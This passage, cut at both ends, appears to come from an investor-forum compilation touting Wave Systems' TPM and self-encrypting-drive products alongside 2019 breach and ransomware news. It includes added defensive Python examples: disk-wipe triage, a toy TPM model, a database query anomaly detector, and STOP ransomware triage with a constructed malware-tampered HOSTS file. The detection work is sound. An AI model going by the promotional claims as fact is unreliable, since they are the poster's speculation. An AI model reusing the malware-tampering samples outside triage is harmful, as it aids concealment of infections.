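    b"\xd0\xcf\x11\xe0": "ole/office",
}
RANDOM_THRESHOLD = 7.0  # bits/byte; 512 random bytes score about 7.6


def entropy(chunk: bytes) -> float:
    """Shannon entropy in bits per byte; text is ~4-5, ciphertext approaches 8."""
    n = len(chunk)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(chunk).values())


def triage_image(image: bytes) -> Dict[str, object]:
    """Walk an image sector by sector and classify it."""
    total = (len(image) + SECTOR - 1) // SECTOR
    zero = high = 0
    signatures: Counter = Counter()
    for i in range(total):
        sec = image[i * SECTOR:(i + 1) * SECTOR]
        if not any(sec):           # all 0x00: consistent with a zero-fill wipe
            zero += 1
            continue
        if entropy(sec) >= RANDOM_THRESHOLD:
            high += 1
        for magic, kind in MAGICS.items():
            if sec.startswith(magic):
                signatures[kind] += 1
    nonzero = total - zero
    if nonzero == 0:
        verdict = "wiped"
    elif not signatures and high >= 0.9 * nonzero:
        verdict = "encrypted"      # random-looking and no plaintext structure
    else:
        verdict = "residual data"  # readable content or file headers survive
    return {"sectors": total, "zero": zero, "high_entropy": high,
            "signatures": dict(signatures), "verdict": verdict}


def triage_file(path: str) -> Dict[str, object]:
    """Same check on an image file on disk (reads it whole; fine for small images)."""
    with open(path, "rb") as fh:
        return triage_image(fh.read())


def sample_images() -> Dict[str, bytes]:
    """Constructed stand-ins for three devices from the study, not real dumps."""
    # "Encrypted": a deterministic SHA-256 stream standing in for SED ciphertext.
    stream = b"".join(hashlib.sha256(b"toy-key" + i.to_bytes(4, "big")).digest()
                      for i in range(8 * SECTOR // 32))
    photo = (b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x00" * 40).ljust(SECTOR, b"\x00")
    notes = (b"Customer: Jane Doe, account 0001, balance 1200.00\n" * 9).ljust(
        2 * SECTOR, b"\x00")
    leftover = photo + notes + bytes(5 * SECTOR)   # 8 sectors, 6 of them zero
    return {"wiped": bytes(8 * SECTOR), "encrypted": stream, "leftover": leftover}


if __name__ == "__main__":
    for name, img in sample_images().items():
        print(name, triage_image(img))
```

A zero-fill check alone would pass the "leftover" image's six empty sectors; the verdict comes from the sectors that are not empty.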
==================================================================
If companies initialized their SEDs with Wave SED management then when the hard drives came to their 'end of life', the companies could crypto-erase the drives for recycling or retirement. That crypto-erase process is much more efficient than other techniques on the market!! Helping to stop ransomware is another great feature of the SED and Wave SED management!! Wave SED management should be on the hot list of a LOT of companies!
==================================================================
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Excerpts:
Enterprises choose Wave to manage SEDs
Why? From our single console, you can manage all your organization’s self-encrypting drives (SEDs) easily and remotely, whether they number in the hundreds, or hundreds of thousands.
SEDs are the most secure, best-performing and most transparent encryption option for protecting data on laptops. These drives automatically encrypt all data written to the drive, so you don’t have to decide what’s important enough to encrypt. They also perform this encryption in the hardware of the drive, so you don’t end up with the performance issues software full-disk encryption is infamous for. SEDs are available as HDD or SSD, and are sold by most major drive manufacturers.
Wave’s management solution delivers remote drive initialization, user management, drive locking, user recovery and crypto-erase for all Opal-based, proprietary and solid-state SEDs.
Montreal researchers develop a new method to protect against ransomware attacks
https://www.concordia.ca/news/stories/2019/03/20/montreal-researchers-develop-a-new-method-to-protect-against-ransomware-attacks.html
Data deletion malware can be devastating but also thwarted, says Concordia professor Mohammad Mannan
When the WannaCry attack in May 2017 compromised hundreds of thousands of computers worldwide, it was among the biggest such ransomware campaigns on record. Besides countless individual users, organizations like the United Kingdom’s National Health Service, FedEx, Honda, as well as government ministries in Russia, India and elsewhere were affected.
Ransomware is not new, but the scope of the WannaCry attack and others that followed has cybersecurity experts worried. Ransomware is a form of malicious software that encrypts or can even destroy valuable files stored on a computer’s hard drive. Users who find their files encrypted usually receive a message demanding payment — a ransom, usually in the form of one cryptocurrency or another — to descramble the files.
While the most up-to-date operating systems (OS) are equipped with sophisticated anti-malware defenses, no system is immune from outside interference. However, Mohammad Mannan, associate professor at the Gina Cody School of Engineering and Computer Science, with his former PhD student Lianying Zhao, has recently developed a new method of protecting systems against these kinds of attacks.
The method, which he dubbed Inuksuk, uses hardware instead of software to protect sensitive data. Essentially, he has designed a method in which a pre-installed self-encrypting drive (SED) creates a partition that is protected by a high-entropy keyword. Even the user does not know the randomly generated keyword, and it is unique to the machine in which it is operating.
Once the Inuksuk program is installed, the SED pairs with a Trusted Platform Module (TPM) chip attached to the computer’s central processing unit. The TPM will block any process other than the valid Inuksuk program from accessing the SED keyword. Both the SED and TPM are common chips manufactured by major hardware companies.
A protected partition
The partition is a safe, tamper-proof location where data can be stored. If a user wants to write a file into it, they need access to the protected keyword, which is available only to the unmodified Inuksuk software. Inuksuk targets writing operations, so files can be read but not modified — thus thwarting encryption attempts by malware.
“Having a partition like this protects the files that are very special to you — the kind you really don’t want to lose in a ransomware attack,” says Mannan, who works at the Concordia Institute for Information Systems Engineering. “When you get infected, this software ensures that the ransomware can delete anything it likes from your regular partition but it cannot erase anything from your protected partition.”
Inuksuk will also freeze a computer’s operating system while it is running. Any malware that has made its way into the OS will be inactive while files in the protected partition are being modified. However, a computer that is linked to a network can run Inuksuk and its OS simultaneously.
“When your OS is compromised, none of the other solutions that currently exist, either in academia or industry, can survive in any effective way,” Mannan explains.
“Our primary goal was to protect computers from ransomware or any other data deletion attacks and also from rootkit level attacks.”
As for the name, Mannan says he borrowed the word “inuksuk” from the Inuit language of Inuktitut. “It has several meanings, and one of them is to indicate a place where you store food or other valuable things,” he says. “It’s a marker for people so they can find something important. We use it as a marker for your important data.”
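Added example, a simplified model rather than the Inuksuk code from Mannan and Zhao: a toy TPM whose seal/unseal is bound to PCR measurements, a locked SED range that anyone can read but only the holder of the sealed credential can write, and a machine that measures the updater binary at launch. Every name below (ToyTPM, SEDRange, TRUSTED_INUKSUK) is an assumption of this model.

```python
"""Added example, a simplified model rather than the Inuksuk code from Mannan and
Zhao: a SED range whose unlock credential is sealed to TPM measurements, so
anyone can read it but only the unmodified updater binary can write to it."""
import hashlib
import hmac
import secrets
from typing import Dict, Optional


def sha256(*parts: bytes) -> bytes:
    h = hashlib.sha256()
    for p in parts:
        h.update(p)
    return h.digest()


class ToyTPM:
    """PCR extend plus seal/unseal bound to the PCR value (TPM semantics, simplified)."""

    def __init__(self) -> None:
        self._srk = secrets.token_bytes(32)  # storage root key: never leaves the chip
        self.pcr = bytes(32)                 # reset value at power-on

    def reset(self) -> None:
        self.pcr = bytes(32)

    def extend(self, measurement: bytes) -> None:
        # PCR_new = H(PCR_old || measurement): later code cannot undo earlier history.
        self.pcr = sha256(self.pcr, measurement)

    def seal(self, secret: bytes) -> Dict[str, bytes]:
        """Return a blob that only unseals while the PCR holds today's value."""
        assert len(secret) == 32
        mask = sha256(self._srk, b"mask", self.pcr)
        ct = bytes(a ^ b for a, b in zip(secret, mask))
        return {"ct": ct, "tag": sha256(self._srk, b"tag", self.pcr, ct)}

    def unseal(self, blob: Dict[str, bytes]) -> Optional[bytes]:
        expected = sha256(self._srk, b"tag", self.pcr, blob["ct"])
        if not hmac.compare_digest(expected, blob["tag"]):
            return None                      # measurements differ from seal time
        mask = sha256(self._srk, b"mask", self.pcr)
        return bytes(a ^ b for a, b in zip(blob["ct"], mask))


class SEDRange:
    """A locked range of a self-encrypting drive: open reads, writes need the credential."""

    def __init__(self, credential: bytes) -> None:
        self._credential = credential
        self.blocks: Dict[int, bytes] = {}

    def read(self, lba: int) -> Optional[bytes]:
        return self.blocks.get(lba)

    def write(self, lba: int, data: bytes, credential: bytes) -> bool:
        if not hmac.compare_digest(credential, self._credential):
            return False
        self.blocks[lba] = data
        return True


# Constructed stand-in for the genuine Inuksuk binary that gets measured at launch.
TRUSTED_INUKSUK = b"inuksuk-v1 (constructed binary image)"


class Machine:
    def __init__(self) -> None:
        self.tpm = ToyTPM()
        credential = secrets.token_bytes(32)   # high-entropy; the user never sees it
        self.protected = SEDRange(credential)
        self.launch(TRUSTED_INUKSUK)           # provisioning measures the real binary
        self.sealed = self.tpm.seal(credential)
        del credential                         # only the TPM blob remains

    def launch(self, binary: bytes) -> None:
        """Power-cycle model: PCR resets, then the loaded binary is measured."""
        self.tpm.reset()
        self.tpm.extend(sha256(binary))

    def write_via(self, binary: bytes, lba: int, data: bytes) -> bool:
        """Run `binary` as the updater; it succeeds only if it is the measured one."""
        self.launch(binary)
        credential = self.tpm.unseal(self.sealed)
        return credential is not None and self.protected.write(lba, data, credential)


if __name__ == "__main__":
    m = Machine()
    print(m.write_via(TRUSTED_INUKSUK, 0, b"tax-2018.pdf contents"))           # True
    print(m.write_via(TRUSTED_INUKSUK + b"+patched", 0, b"overwritten"))        # False
    print(m.protected.read(0))                                                   # unchanged
```

The model leaves out the part of Inuksuk that freezes the OS during protected writes; here the point is only that a patched binary measures differently and so never receives the credential.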
==================================================================
Is Mohammad Mannan's idea novel or did Robert Thibadeau (ex-Wave VP) already have a way to stop ransomware using a SED? Mannan's idea makes use of the TPM and SED!! - Two of Wave's strong suits. It seems that Wave managing both the TPM and SED would be instrumental here.
=================================================================
https://www.wavesys.com/wave-alternative
The IT perimeter is gone
With tablets, smartphones, and cloud applications, your employees can access sensitive data anytime, from anywhere. Indeed, around 70 percent of security breaches and data thefts are inside jobs. Meanwhile, the hackers only get better: advanced persistent threats (APTs) appear as normal traffic, and malware can go unnoticed for weeks.
It’s a new world, one without borders. Yet most organizations are still trying to protect their data with the same old firewalls and antivirus software. It’s not working. We refer you to the headline-making breach of the week.
You have to start with the device
Wave has an alternative: security that’s built into each and every device.
We’re talking about hardware: self-encrypting drives (SEDs), which protect data when a device is stolen or lost, and trusted platform modules (TPMs), or embedded security chips. Both go in at the factory, and increasingly, both are standard. They make it possible for you to monitor and control each individual device and its data, no matter where it is. But you need software to turn on and manage your SEDs and TPMs. Wave makes that software.
We’ve been refining comprehensive, centralized management of hardware-based security longer than anyone else. More than that, we’ve shaped the field as a founding member of the Trusted Computing Group, the not-for-profit that develops and promotes industry standards for the hardware.
Security that’s confirmed, not assumed
With Wave, you’ll know that you’re secure. Because we start with the individual devices, you get a broad, deep view of your network. You can see exactly who’s on it, with what devices and what apps, at any given time. Just for example, if Bob goes home and tries to log onto Facebook with the company laptop, Wave can stop him.
A big piece of this heightened security is device authentication. Traditional two-factor authentication requires what amounts to two user IDs. But by using the TPMs inside your devices, Wave can confirm the identity of not only users, but also the devices they’re on. Combine that with fast, enforced encryption of sensitive data via your SEDs—all easily managed with Wave software—and your data is protected from the full range of modern risks: device theft, missent emails, flash drives, portable hot spots … even (and no one else can say this) hardware keyloggers. Not to mention Bob.
Do we need to say that with Wave, compliance is no problem?
Start closing your security gaps today, with what you’ve got
You might be surprised to hear that 90 percent or more of your computers probably already have TPMs. Mobile devices are catching up fast. SEDs are newer, but you probably have a bunch of those too. Machines that don’t have them can often be outfitted at little to no extra cost. So you’ve got some or all of the hardware. All you need to do is turn it on with Wave.
It’s almost as easy as it sounds. TPMs and SEDs are built to open, vendor-neutral industry standards, and so are Wave solutions. That means Wave works on your existing mix of hardware, across platforms, and will evolve with you. It’s part of what makes the Wave alternative not only more secure, but also simpler and cheaper. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
Questions? Read on, or contact our sales department.
Nielsen warns US 'not prepared' for foreign cyberattacks
https://thehill.com/policy/cybersecurity/434554-nielsen-us-is-not-prepared-for-foreign-cyberattacks
Homeland Security Secretary Kirstjen Nielsen on Monday called for the U.S. to take on a “whole of society” approach to combat cyber threats, saying the U.S. “is not prepared” to handle hackers backed by other countries.
“It’s not just U.S. troops and government agents on the frontlines anymore,” Nielsen said at a speech at George Washington University. “It’s U.S. companies. It’s our schools and gathering places. It’s ordinary Americans.”
The Department of Homeland Security (DHS) chief said that as hackers target the devices of all Americans, “your average private citizen or company is no match against a nation-state such as China, Iran, North Korea or Russia.”
“It is not a fair fight,” Nielsen continued. “And until now our government has done far too little to back them up.”
American officials have pointed to hackers backed by countries like Russia, China and North Korea as presenting a major threat to the U.S., including potentially interfering in elections.
“Let me just send one last message to our cyber adversaries,” Nielsen said Monday. “You cannot hide behind your keyboards and computer screens, we are watching you. And no matter what malware you develop, I promise you, the engines of our democracy are far stronger and far more resilient than any code you can write.”
She also said her department is taking more steps to identify cyber threats within the supply chain. Authorities have repeatedly warned that technology manufactured in another country like China could pose a threat to national security.
And Nielsen said that DHS is increasingly working with the Department of Defense to address cyber issues, after she and former Defense Secretary James Mattis signed an agreement last year to share more information about cyber incidents and operations.
“It has really helped us knit together and leverage each other's capabilities,” she said. “We analyze the threat together.”
=================================================================
The results of the current cybersecurity being used to battle these hackers are basically summed up in this article. Computer companies have spent billions of dollars on a built-in security chip called the TPM, which is on the enterprise computer's motherboard. Why not turn them on, along with the services that go with them, and see why 150+ companies back this international standard? The TPM 'turn on' could MAGA!!!
=================================================================
https://www.wavesys.com/
Fourth Major Credential Spill in a Month Hits DreamMarket
https://threatpost.com/fourth-credential-spill-dreammarket/142901/
Gnosticplayers has released about 26 million records from what he said are breaches of six new companies.
The hacker behind more than 840 million account records appearing for sale on the Dark Web in February (in dumps collectively known as Collections 1-3) is back with 26.42 million more records from six companies.
The adversary, who goes by the handle Gnosticplayers, is asking just 1.2431 Bitcoin (roughly $4,940), according to ZDNet, which spotted the records for sale on DreamMarket over the weekend.
With this latest credential dump, a total of 38 companies have found their users' account data up for sale on the underground at the hands of Gnosticplayers. The six companies impacted this time are an eclectic bunch, comprising the GameSalad developer platform, a Brazilian Amazon-equivalent called Estante Virtual, project-management apps Coubic and LifeBear, and two Indonesian companies: the Bukalapak e-commerce giant and a student career site, YouthManual.
The hacker told ZDNet that he obtained these records just last month, and that they all lacked strong encryption for their passwords. So far, the records haven't been confirmed as legitimate, but if past is prologue, it's worth noting that previous collections were confirmed as containing real user data.
Gnosticplayers told the outlet that the “lack of security in 2019 is making me angry” – but the motivation seems less than altruistic given the financial gain he’s looking for; he admitted to trying to extort companies in exchange for not publishing the credentials. Some gave into his demands and so their records weren’t published, he claimed.
“After four rounds of user records being put up for sale by this entity, there is a clear pattern that speaks to the way we utilize personal data,” George Wrenn, CEO at CyberSaint Security, said via email. “This data – 26 million records – was obtained within just the past few months. This is not a small incident, as mass amounts of individuals’ personal data is being sold. If anyone had any doubts before, this example should convince them that data truly is the new currency.”
If the claim that the records are freshly hacked turns out to be true, that will be a departure from the previous collections; Collection #1 for instance contained records culled from breaches that occurred as far back as 2010, including the well-known compromise of Yahoo. Fresher data translates into more acute danger of course; users are less likely to have rotated their passwords on accounts that were active a month or less ago. In other words, the account details are much less likely to be outdated.
That could give even more wings to the escalating issue of credential-stuffing and brute-force attacks, where cybercriminals bank on password reuse by trying stolen credentials against other, perhaps higher-value prey, such as online banking portals.
Some in the defense community are saying enough is enough.
“The frequent and recurrent instances of anonymous hackers selling large quantities of stolen identities emphasizes the profound impunity of these crimes,” John Gunn, CMO at OneSpan, said via email. “Using modern hacking tools, criminals can operate with little risk of being caught or ever brought to justice and the result is billions of dollars of losses. To me, this is a strong argument in favor of allowing counter attacks against these anonymous parties by state and private organizations.”
==================================================================
Wave VSC 2.0 has features that can prevent the criminals in this article from their nefarious activities on organizations!!! It truly is one of Wave's amazing solutions!
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Token-free, password-free user authentication
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
Key Features:
Superior User Experience
• No more tokens or smart cards to achieve two-factor authentication
• Eliminate VPN/WiFi/website passwords for faster access to resources
• No add-on software means improved OS performance
IoT Security Bills for US Government Will Also Affect Business IT
https://www.eweek.com/security/iot-security-bills-for-us-government-will-also-affect-business-it
==================================================================
If the U.S. government is serious about cybersecurity, why doesn't the U.S. government make the 'turn on' of the TPM a requirement for a better grade on security?! The link below shows one of the many benefits to the 'turn on' of the TPM.
==================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
House Dem introduces bill requiring public firms to disclose cybersecurity expertise in leadership
https://thehill.com/policy/cybersecurity/433880-house-dem-introduces-cyber-bill-that-would-require-publicly-traded
A Democrat on the House Intelligence Committee introduced a bill on Wednesday that would require publicly traded companies to disclose to investors whether any members of their board of directors have cybersecurity expertise amid growing cyberattacks targeting U.S. companies.
Rep. Jim Himes (D-Conn.) introduced the Cybersecurity Disclosure Act of 2019, a companion to a bill introduced in the upper chamber, that would make the Securities and Exchange Commission issue a new set of rules requiring U.S. companies to tell their investors whether they have someone who has cyber expertise on their board. If they don't, they must explain to their investors why this is the case.
The bill comes at a time when "cyberattacks and data breaches against U.S. companies are becoming more frequent and sophisticated," according to a press release accompanying the rollout of the bill.
The press release cited a study from the Identity Theft Resource Center that found a 126 percent rise in data breaches that exposed records containing personally identifiable information. The number of exposed records rose across all industries, from 197.6 million in 2017 to 446.5 million in 2018.
"It's not only the shareholders of companies who are at risk," Himes said in a statement. "Americans' private and identifying information is in the hands of corporations who may not be prepared to protect it. The Cybersecurity Disclosure Act will give the public information about which companies are likely to have better protections and cyberdefense strategies."
"Publicly traded companies should have an obligation to let their shareholders know how they are addressing these serious threats or explain why they are not taking measures to counter attacks. Billions of dollars of American wealth are at risk, and I am tired of seeing American companies play catchup against our geopolitical rivals or lone-wolf threats," he continued.
The Senate companion bill has bipartisan support, with Sens. Jack Reed (D-R.I.), Mark Warner (D-Va.), Susan Collins (R-Maine) and John Kennedy (R-La.).
==================================================================
In light of this bill, 'better security at less than half the cost' could resonate faster with public companies! Wave solutions could become the 'go to' set of cybersecurity solutions!!
==================================================================
https://www.wavesys.com/
Marriott CEO reveals more details about the massive data breach
https://www.helpnetsecurity.com/2019/03/12/marriott-data-breach-details/
Last Thursday, Equifax CEO Mark Begor and Arne Sorenson, the CEO of Marriott International, appeared before a US Senate subcommittee to testify about the massive data breaches their companies have suffered.
While Begor’s statement was more about the security measures Equifax has implemented since the breach and the company’s plans to implement more protections and increase security investment, Sorenson’s revealed more information about the actual breach.
The Marriott breach post-mortem
As it was known soon after the breach was made public in November 2018, the attackers gained access to the Starwood Guest Reservation Database in the United States in 2014.
Marriott International acquired Starwood Hotels & Resorts Worldwide in September 2016, but at the time of the breach it had yet to retire it and migrate all of Starwood’s hotels onto Marriott’s reservation system (they finally did in December 2018).
The first indication that something might be wrong was on September 8, 2018, when Accenture, which managed the Starwood Guest Reservation Database, notified Marriott's IT team about an unusual query from an administrator's account.
As it turned out, the query was not made by the individual whose credentials were used, and Marriott called in third-party investigators to investigate the scale and scope of the incident.
The investigators first uncovered a Remote Access Trojan used by the attackers, and then Mimikatz (a tool for discovering usernames and passwords in computer systems' memory).
Proof that data from the Starwood Guest Reservation Database had been exfiltrated was discovered on November 13, when the investigators found evidence that two compressed, encrypted files had been deleted from a device that they were examining and that those two files had potentially been removed from the Starwood network.
“Six days later, on November 19, 2018, investigators were able to decrypt the files, and found that one contained an export of a table from the Starwood Guest Reservation Database containing guest data, while the other contained an export of a table holding passport information,” Sorenson explained.
“On November 25 and 26, we found that, in 2015 and 2016, prior to our acquisition of Starwood, the attacker had likely created a copy of two other tables, which the attacker later deleted. The file names correspond to two other tables in the Starwood Guest Reservation Database. We have been unable to recover those files and could not determine if they had been taken.”
Soon after they proceeded with notifying law enforcement, regulators, the public and affected customers.
The scope of the breach
The Marriott mega breach resulted in the compromise of:
•383 million guest records
•18.5 million encrypted passport numbers
•5.25 million unencrypted passport numbers (approximately 663,000 of which from US travelers)
•9.1 million encrypted payment card numbers.
•Several thousand unencrypted payment card numbers.
“To date, we have not found evidence that the master encryption keys needed to decrypt encrypted payment card and passport numbers were accessed, but we cannot rule out that possibility,” Sorenson shared.
He also said that, thus far, they have “not received any substantiated claims of loss from fraud attributable to the incident” and that the security firms they engaged to monitor the dark web have not found evidence that the stolen information has been offered for sale.
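Added example (not Accenture's or Marriott's tooling): detection logic for the kind of event that opened this investigation, a privileged database account issuing a query from a source host it has never used, returning far more rows than usual, with no filter on the statement. The audit-log format, account names, hosts and thresholds are all constructed.

```python
"""Added example (not Accenture's or Marriott's tooling): flag a privileged DB
account querying from a new place and at a scale it never has before."""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Set

# Constructed audit-log format; real DB audit logs differ but carry the same fields.
LINE_RE = re.compile(
    r'^(?P<ts>\S+) user=(?P<user>\S+) host=(?P<host>\S+) rows=(?P<rows>\d+) stmt="(?P<stmt>[^"]*)"$'
)
BULK_ROWS = 100_000   # rows returned that count as an export (assumed threshold)

Event = Dict[str, object]


def parse(lines: Iterable[str]) -> List[Event]:
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:                                  # unparseable lines are skipped
            ev: Event = m.groupdict()
            ev["rows"] = int(m.group("rows"))
            events.append(ev)
    return events


def build_baseline(history: List[Event]) -> Dict[str, Set[str]]:
    """Source hosts each account has been seen on during the learning window."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for ev in history:
        seen[str(ev["user"])].add(str(ev["host"]))
    return seen


def find_anomalies(events: List[Event], baseline: Dict[str, Set[str]],
                   privileged: Set[str]) -> List[Event]:
    alerts = []
    for ev in events:
        user, host, stmt = str(ev["user"]), str(ev["host"]), str(ev["stmt"]).upper()
        reasons = []
        if user in privileged and host not in baseline.get(user, set()):
            reasons.append("new_host_for_privileged_account")
        if int(ev["rows"]) >= BULK_ROWS:
            reasons.append("bulk_rows")
        if stmt.startswith("SELECT") and " WHERE " not in stmt and " LIMIT " not in stmt:
            reasons.append("unfiltered_select")
        if reasons:
            alerts.append({"ts": ev["ts"], "user": user, "host": host, "reasons": reasons})
    return alerts


# Constructed sample: a week of ordinary activity, then the odd one out.
HISTORY = [
    '2018-09-01T09:12:03Z user=swd_dba host=10.20.1.15 rows=1 '
    'stmt="SELECT count(*) FROM guest_profile WHERE updated_at > \'2018-08-31\'"',
    '2018-09-03T10:01:47Z user=swd_dba host=10.20.1.15 rows=0 '
    'stmt="UPDATE rates SET base=189 WHERE property_id=4412"',
    '2018-09-05T08:55:10Z user=resapp host=10.20.7.40 rows=12 '
    'stmt="SELECT * FROM reservations WHERE guest_id=88213"',
]
NEW = [
    '2018-09-07T14:02:11Z user=resapp host=10.20.7.40 rows=3 '
    'stmt="SELECT * FROM reservations WHERE guest_id=90411"',
    '2018-09-08T02:41:09Z user=swd_dba host=192.0.2.77 rows=2500000 '
    'stmt="SELECT * FROM guest_profile"',
]
PRIVILEGED = {"swd_dba"}


def demo() -> List[Event]:
    return find_anomalies(parse(NEW), build_baseline(parse(HISTORY)), PRIVILEGED)


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```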
=================================================================
If Marriott used Wave VSC 2.0, the person making the query would have needed the computer (TPM) that was associated with the credentials used to have been able to do the query. Wave VSC 2.0 would have stopped this query from happening since the attacker would not have possessed the computer! Wave Endpoint Monitor could have stopped the Trojan! Wave solutions could have saved Marriott many millions of dollars!
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Get better security at less than half the cost
Passwords are weak. Tokens are expensive. Don’t compromise on security or price.
Wave Virtual Smart Card does anything your physical smart cards and tokens do, but it starts with hardware you already have: the Trusted Platform Module (TPM), a hardware security chip built into the motherboard of most business-class PCs. You may not even know you have it, but once you do, the TPM can be used in a myriad of ways. Wave turns it into a smart card, embedded directly into your laptop.
What can it be used for?
What do you use your smart card for today? With the exception of keying open the door at work, Wave Virtual Smart Card can perform any of the services or applications you rely on your smart card for today. Secure VPN, WiFi, remote desktop, cloud applications – it can all be done with a virtual smart card.
One helpdesk call you'll never get: "I lost my virtual smart card again..."
There are so many ways to lose a token – couch cushions, street drains, curious toddlers. In fact, up to 30% of all tokens are eventually lost. It’s much harder to lose a laptop, and you notice a lot faster when you do.
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
What will you do with >50% TCO savings?*
Tokens and smart cards require an additional hardware purchase, plus the time and money to ship to remote users. Use something that’s already in the users’ hands (the TPM), and your acquisition and deployment costs are lower.
Then consider the management savings in not having to replace lost and stolen tokens. That means fewer helpdesk calls, less interruption of user productivity, and fewer acquisition and shipping costs.
When we say “secure”…
…we mean it. Our solution starts with a proven hardware root-of-trust. Multi-factor authentication is an established best-practice for strong authentication: the TPM-based virtual smart card is one factor (something you have) and the user PIN is a second factor (something you know).
STOP Ransomware Installing Password Stealing Trojans on Victims
https://www.bleepingcomputer.com/news/security/stop-ransomware-installing-password-stealing-trojans-on-victims/
In addition to encrypting a victim's files, the STOP ransomware family has also started to install the Azorult password-stealing Trojan on victims' computers to steal account credentials, cryptocurrency wallets, desktop files, and more.
The Azorult Trojan is a computer infection that will attempt to steal usernames and passwords stored in browsers, files on a victim's desktop, cryptocurrency wallets, Steam credentials, browser history, Skype message history, and more. This information is then uploaded to a remote server that is under the control of the attacker.
When we first covered the DJVU variant of the STOP Ransomware being distributed by fake software cracks in January, we noted that when the malware was executed it would download various components that are used to perform different tasks on a victim's computer. These tasks include showing a fake Windows Update screen, disabling Windows Defender, and blocking access to security sites by adding entries to Windows's HOSTS file.
When ransomware researcher Michael Gillespie tested some recent variants he noticed that an Any.Run install indicated that one of the files downloaded by the ransomware created traffic that was from an Azorult infection. Gillespie further told BleepingComputer that four different samples all showed network traffic associated with Azorult.
BleepingComputer downloaded and installed a sample of the STOP Promorad Ransomware variant to see if Azorult would be installed.
When we executed the ransomware, it proceeded to download the files listed in the IOCs below and encrypt the computer. In this particular variant, when files are encrypted it will append the .promorad extension to encrypted files and create ransom notes named _readme.txt as shown below.
The Promorad Ransomware variant samples we tested also downloaded a file named 5.exe and executed it. When executed, the program will create network traffic that is identical to known command & control server communications for the Azorult information-stealing Trojan.
Furthermore, when this file was scanned using VirusTotal, numerous security vendors detect this file as a password-stealing Trojan.
Being a victim of ransomware is bad enough, but to know that your passwords and documents may be stolen as well just adds another layer of issues that victims need to be concerned about.
Victims who have been infected with a STOP Ransomware variant should immediately change the passwords to any online accounts that are used, especially ones that are saved in the browser. Victims should also change passwords in software such as Skype, Steam, Telegram, and FTP Clients. Finally, victims should check any files stored on the Windows desktop for private information that may now be in the hands of the attackers.
STOP Ransomware has become a prolific extension with numerous variants and it is not currently known how long they have been installing Azorult. Therefore, to be safe all victims of STOP should perform the above remediation.
The known list of STOP extensions include:
If you have any concerns or questions regarding this ransomware, feel free to post in our dedicated STOP Ransomware Support & Help topic.
--There are a couple of diagrams at the link.
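The article names four concrete artifacts of this variant: HOSTS-file entries that sink security sites, the .promorad extension, the _readme.txt ransom note, and a downloaded 5.exe. The script below is an added triage example (not code from BleepingComputer, the malware, or Wave) that turns the first three into checks a responder can run over a copied HOSTS file and a directory listing. The HOSTS content and the file listing are constructed samples; 5.exe is left out because the article gives no hash or path for it.

```python
"""Triage helpers for the STOP/Djvu behaviour described in the article.

Added example; not code from BleepingComputer or from the malware. All sample
data below is constructed, not taken from a real infection."""
import ntpath
from collections import Counter
from typing import Dict, Iterable, List

# Constructed content of a tampered C:\Windows\System32\drivers\etc\hosts.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0   www.bleepingcomputer.com   # added by the malware
0.0.0.0   www.virustotal.com
127.0.0.1 any.run
"""

# Names a stock HOSTS file may legitimately map to a loopback address.
DEFAULT_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
                 "ip6-localhost", "ip6-loopback"}
SINKHOLE_IPS = {"0.0.0.0", "127.0.0.1", "::1"}


def blackholed_hosts(hosts_text: str) -> List[str]:
    """Return hostnames the HOSTS file sends to a loopback/null address,
    ignoring the stock localhost entries. Malware that blocks security sites
    this way (as the STOP variant does) shows up here."""
    found: List[str] = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line:
            continue
        ip, *names = line.split()
        if ip in SINKHOLE_IPS:
            found.extend(n.lower() for n in names if n.lower() not in DEFAULT_NAMES)
    return found


# The only extension and note name the article gives for this variant; extend
# STOP_EXTENSIONS from the vendor's list when triaging other variants.
STOP_EXTENSIONS = {".promorad"}
RANSOM_NOTE = "_readme.txt"

# Constructed directory listing of a hit workstation.
SAMPLE_LISTING = [
    r"C:\Users\alice\Documents\report.docx.promorad",
    r"C:\Users\alice\Documents\_readme.txt",
    r"C:\Users\alice\Pictures\cat.jpg.promorad",
    r"C:\Users\alice\Pictures\_readme.txt",
    r"C:\Users\alice\Desktop\passwords.xlsx",
    r"C:\Windows\System32\drivers\etc\hosts",
]


def ransomware_indicators(paths: Iterable[str]) -> Dict[str, object]:
    """Count files carrying a STOP extension and _readme.txt notes, and list
    the directories that hold a note (each encrypted folder gets one)."""
    by_ext: Counter = Counter()
    note_dirs = set()
    for p in paths:
        base = ntpath.basename(p)                 # handles Windows paths on any OS
        ext = ntpath.splitext(base)[1].lower()
        if ext in STOP_EXTENSIONS:
            by_ext[ext] += 1
        elif base.lower() == RANSOM_NOTE:
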